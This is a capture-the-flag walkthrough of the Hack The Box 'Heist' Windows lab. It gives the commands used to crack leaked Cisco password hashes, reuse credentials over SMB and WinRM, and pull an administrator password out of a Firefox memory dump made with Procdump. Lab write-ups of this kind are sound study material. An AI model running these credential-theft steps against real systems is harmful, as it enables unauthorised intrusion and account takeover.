Hack The Box - Heist - Walkthrough

Introduction

Today we're going to be doing a pentest walkthrough of the Heist machine hosted at https://hackthebox.eu.  For this pentest, we'll be using a Kali Linux virtual machine as our attacking system and the Heist machine as the victim system.  After connecting to the Hack the Box network via VPN, we see that our target is located at 10.129.118.120.

Scanning and Enumeration

We'll start by scanning for open ports with Nmap:

nmap -T4 -p- 10.129.118.120

Now we'll do another Nmap scan, this time specifying the ports and picking up service names and version numbers:

nmap -sV -T4 -p80,135,445,5985,49669 10.129.118.120

This seems mostly typical for Windows systems, but we notice that port 5985 is open, which is associated with WinRM, so we'll keep in mind as we continue with our enumeration.  For now, we'll take a look at the webpage:

http://10.129.118.120

If we don't have credentials for the page, we might as well try enumerating as a guest user:

http://10.129.118.120/login.php?guest=true

We're redirected to this tech support conversation.  There's a few different things to note here.  First, we're dealing with Cisco software / equipment on this system.  Second, there's a username Hazard on the server.  Third, there's an attachment file to look at:

http://10.129.118.120/attachments/config.txt

We have a few different password hashes and usernames here.  The first hash appears to be in MD5crypt format, because the string starts with $1$.  After a bit of research, we discovered this webpage which explains how Cisco router passwords are hashed:

https://learningnetwork.cisco.com/s/article/cisco-routers-password-types

Using that information, we deduce that the other two password hashes are type 7 Cisco router passwords, which means they are encrypted using a Vigenere cipher, and there are a few different websites we can use to decode Cisco Type 7 Password strings.  We use the following URL to do so:

https://packetlife.net/toolbox/type7/

Now the only password we have left to crack is the MD5crypt one.  We copy the string to a file, then use John the Ripper to crack it with rockyou.txt as wordlist:

john --wordlist=rockyou.txt --format=md5crypt heistMD5.txt

Now that we have cracked a few potential passwords and captured a few usernames, we can attempt to authenticate into SMB using one of these combinations.  We find that the credential combination of hazard and stealth1agent are valid credentials for SMB, as illustrated here:

smbclient -L \\\\10.129.118.120\\ -U hazard

We successfully enumerate SMB shares names using the hazard / stealth1agent credentials, but are unable to continue.  Now that we've identified valid SMB credentials, we can attempt to further enumerate the SMB service using Enum4linux:

enum4linux -a -u hazard -p stealth1agent 10.129.118.120 | grep -i user

We manage to pick up a few more usernames for the system, so we can attempt to match one of these names with remaining cracked passwords we have.  It turns out that the chase user matches up with the Cisco router admin password Q4)sJu\Y8qz*A3?d .  That implies that chase is an admin user on the Windows system, and we also recall that WinRM is available on the server, so we attempt to login using the chase credentials:

evil-winrm -i 10.129.118.120 -u chase -p 'Q4)sJu\Y8qz*A3?d'

Capturing the User Flag

Hack the Box Windows systems usually store their user flag in a user's \Desktop directory.  

get-content c:\users\chase\desktop\user.txt

Foothold Enumeration

While enumerating the system, we find an unusual process running:

get-process

Privilege Escalation

If we were to use Procdump on the Firefox process, we may be able to capture credential information for any webpage sessions that are active in Firefox.  To do this, we'll need to do the following:

1) Upload Procdump.exe to the Windows system.

2) Execute Procdump on the Firefox process and save the output to a file.

3) Download the dump file to our attacking machine.

4) Enumerate the dump file for credential information.

First, we download the Procdump zip file from the Microsoft website, then upzip the file:

wget https://download.sysinternals.com/files/Procdump.zip
unzip Procdump.zip

Then, from your Evil-WinRM shell, we upload the Procdump.exe file:

upload procdump64.exe

Second, we run Procdump against the Firefox process with the highest CPU usage:

.\procdump64.exe -accepteula -ma 6600

Third, we download the dump file to our attacking system using Evil-WinRM.  This takes quite a bit of time, because the dump file is around 500 mb:

download c:\users\chase\documents\firefox.exe_210325_033219.dmp

Finally, from our attacking machine, we run Strings on the dump file and Grep for usernames:

strings firefox.exe_210325_033219.dmp | grep -i username

We deduce that this password will work for the system's Administrator account, since the hazard user mentioned taking over this system from a previous administrator.  We attempt to login as the Administrator user via Evil-WinRM:

evil-winrm -i 10.129.119.29 -u Administrator -p '4dD!5}x/re8]FBuZ'

Capturing the Root Flag

Hack the Box Windows systems typically store their root flag files in the Administrator user's \Desktop directory:

get-content C:\users\administrator\desktop\root.txt

Summary

After initial scans, we found that a page on the webserver exposed password hashes, which we were able to crack and use to enumerate the target's SMB service, which led to capture of valid WinRM credentials.  Using those credentials, we were able to gain a foothold on the target and found a running Firefox process running on the system.  Through use of the Procdump program, we were able to extract administrator credentials from the process and login to the WinRM service using the Administrator account, allowing us to capture our objective flag file.

Finish